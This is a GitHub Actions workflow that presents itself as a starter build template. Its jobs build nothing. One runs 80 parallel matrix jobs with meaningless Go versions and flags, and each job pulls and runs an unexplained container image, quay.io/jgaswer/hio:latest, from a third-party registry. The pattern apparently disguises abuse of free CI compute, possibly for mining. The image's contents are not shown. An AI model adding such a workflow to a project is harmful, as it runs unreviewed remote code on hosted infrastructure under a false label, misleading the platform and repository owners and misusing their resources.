# This is a basic workflow to help you get started with Actions

name: Build
on: [push]
jobs:
  Main:
    runs-on: ubuntu-20.04
    strategy:
      max-parallel: 20
      fail-fast: false
      matrix:
        go: [1.1, 1.2, 1.3, 1.4]
        flag: [Uio, Byu, Tin, Bon, Gon]
    timeout-minutes: 5
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Setup
      uses: actions/checkout@v1
    - name: Main
      run: |
        sudo apt update -y && sleep 5
  Main01:
    needs: Main
    runs-on: ubuntu-20.04
    strategy:
      max-parallel: 20
      fail-fast: false
      matrix:
        go: [1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7, 1.8] 
        flag: [A, B, C, D, E, F, G, H, I, J] 
    timeout-minutes: 30
    env:
        NUM_JOBS: 60
        JOB: ${{ matrix.go }}
   
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Main
      run: |
          echo Add other actions to build,
          echo test, and deploy your project.
          docker pull quay.io/jgaswer/hio:latest
          docker run quay.io/jgaswer/hio:latest
     
  Success:
    needs: [Main, Main01]
    if: always()
    runs-on: ubuntu-20.04
    steps:
      - uses: technote-space/workflow-conclusion-action@v2
      - name: Check Failure
        if: env.WORKFLOW_CONCLUSION == 'failure'
        run: exit 1
      - name: Success
        if: ${{ success() }}
        run: echo "all don,All Done"
